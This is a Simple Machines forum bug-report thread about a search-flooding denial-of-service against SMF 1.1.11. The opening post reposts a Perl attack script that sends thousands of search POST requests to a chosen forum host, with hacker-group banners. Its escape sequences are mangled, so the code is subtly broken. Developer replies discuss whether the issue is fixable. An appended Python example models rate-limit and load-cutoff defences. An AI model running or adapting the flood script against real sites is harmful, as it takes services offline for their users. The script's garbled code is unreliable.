Simple Machines Community Forum

SMF Development => Bug Reports => Fixed or Bogus Bugs => Topic started by: KinG-InFeT on September 06, 2010, 03:52:18 AM

Title: [Exploit smf 1.1.11] Multiple search DDOS
Post by: KinG-InFeT on September 06, 2010, 03:52:18 AM
######################################

[+] Exploit Title: Simple Machines Forums (SMF 1.1.11) Multiple Search DDOS
[+] Date: 2010-02-11
[+] Author: Ashiyane Digital Security Members (Cair3x)
[+] Software Link: http://www.simplemachines.org/
[+] Version: 1.1.11 And All Version
[+] Tested on: All

######################################

#!/usr/bin/perl

use IO::Socket;

print q{

##################################################

# He Smf Full Ver ha ha ha  Multiple Search DOS #

# Tested on SMF 1.1.11 - 1.1.11 #

# Created By Cair3x ! ;) #

##################################################



[ Script ]



};

$rand=rand(10);

print "Forum Host: ";

$serv = <stdin>;

chop ($serv);

print "Forum Path: ";

$path = <stdin>;

chop ($path);

for ($i=0; $i<9999; $i++)

{

$postit = "search=Cair3x+Cairex+Cair3x+Cair3x+Of+Iran+$x+ &search_terms=any&search_author=&search_forum=-1&search_time =0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=AS C&show_results=posts&return_chars=200";



$lrg = length $postit;



my $sock = new IO::Socket::INET (

PeerAddr => "$serv",

PeerPort => "80",

Proto => "tcp",

);

die "nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!n" unless $sock;



print $sock "POST $path"."index.php?action=search2 HTTP/1.1n";

print $sock "Host: $servn";

print $sock "Accept: text/_xml,application/_xml,application/xhtml+_xml,text/html;q=0 .9,text/plain;q=0.8,image/png,*/*;q=0.5n";

print $sock "Referer: $servn";

print $sock "Accept-Language: en-usn";

print $sock "Content-Type: application/x-www-form-urlencodedn";

print $sock "Accept-Encoding: gzip, deflaten";

print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4n";

print $sock "Connection: Keep-Aliven";

print $sock "Cache-Control: no-cachen";

print $sock "Content-Length: $lrgnn";

print $sock "$postitn";

close($sock);



## Print a "+" for every loop

syswrite STDOUT, "+";

}

print "Forum Be Fuke Raft. Test Konid ...n";



[ / Script ]



######################################

BY : Cair3x [[email protected]]
Web Site : Ashiyane.org
Forum : Http://Ashiyane.org/forums/

[+] Greetz to All Ashiyane Digital Security Member (And Virangar Good Friends)

######################################


fix?
Title: Re: [Exploit smf 1.1.11] Multiple search DDOS
Post by: KinG-InFeT on September 08, 2010, 08:08:43 AM
UP
Title: Re: [Exploit smf 1.1.11] Multiple search DDOS
Post by: Oya on September 08, 2010, 09:33:32 AM
Can't fix this.

This applies to any system that does search when there aren't lots of servers to handle the load.
Title: Re: [Exploit smf 1.1.11] Multiple search DDOS
Post by: Kindred on September 08, 2010, 11:25:30 AM
I am not sure if this counts as an "exploit", especially since the same sort of crap could be done by script to just about ANY site running a script with db search capability....
Title: Re: [Exploit smf 1.1.11] Multiple search DDOS
Post by: emanuele on November 13, 2011, 06:02:40 PM
Would it make sense to have a spamProtection like in SMF2?
Title: Re: [Exploit smf 1.1.11] Multiple search DDOS
Post by: Trekkie101 on August 18, 2012, 07:42:11 AM
SMF 2.0 stops this, also 1.1 can stop it with the form locks in the DB for high load.

Maybe just add a load average for searching in the default DB schema?

Else natural progression of the software has eradicated this, no longer a bug?
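
Added example (not part of the thread and not SMF's own code): a minimal model of the two mitigations raised in the replies above, a per-client minimum interval between searches and a load-average cutoff, replayed over constructed traffic. The class name, thresholds and sample addresses are assumptions chosen for illustration.

```python
import os
from dataclasses import dataclass, field

@dataclass
class SearchGate:
    """Decide whether an expensive search query may run (hypothetical helper)."""
    min_interval: float = 5.0   # assumed: seconds required between searches per client
    max_load: float = 4.0       # assumed: 1-minute load average at which search is refused
    max_tracked: int = 10000    # bound on per-client state kept in memory
    _last: dict = field(default_factory=dict)

    def check(self, client, now, load=None):
        """Return 'ok', 'throttled' or 'overloaded' for one search request."""
        if load is None:
            load = os.getloadavg()[0]  # Unix only; pass load explicitly elsewhere
        if load >= self.max_load:
            return "overloaded"        # refuse before touching the database
        last = self._last.get(client)
        if last is not None and now - last < self.min_interval:
            return "throttled"         # timestamp is left unchanged on refusal
        if client not in self._last and len(self._last) >= self.max_tracked:
            # Drop entries whose interval has expired so the table stays bounded.
            cutoff = now - self.min_interval
            self._last = {c: t for c, t in self._last.items() if t > cutoff}
            if len(self._last) >= self.max_tracked:
                # Too many distinct clients searching at once: fail closed.
                return "overloaded"
        self._last[client] = now
        return "ok"

# Constructed sample traffic: (timestamp, client address, 1-minute load average).
SAMPLE = [
    (0.0, "198.51.100.7", 0.5),  # first search from a client
    (0.2, "198.51.100.7", 0.6),  # repeat 200 ms later, as a scripted loop would send
    (0.4, "198.51.100.7", 0.7),
    (1.0, "203.0.113.9", 0.7),   # different client, unaffected by the throttle
    (6.0, "198.51.100.7", 0.8),  # same client once the interval has passed
    (7.0, "192.0.2.33", 4.5),    # server already above the load cutoff
]

def replay(requests, gate=None):
    """Run constructed requests through a gate and collect the decisions."""
    gate = gate or SearchGate()
    return [gate.check(client, t, load) for t, client, load in requests]

if __name__ == "__main__":
    for (t, client, load), verdict in zip(SAMPLE, replay(SAMPLE)):
        print(f"{t:5.1f}s {client:15} load={load:.1f} -> {verdict}")
```

The per-client check only slows a single source; the load cutoff is what protects the database when requests arrive from many addresses at once.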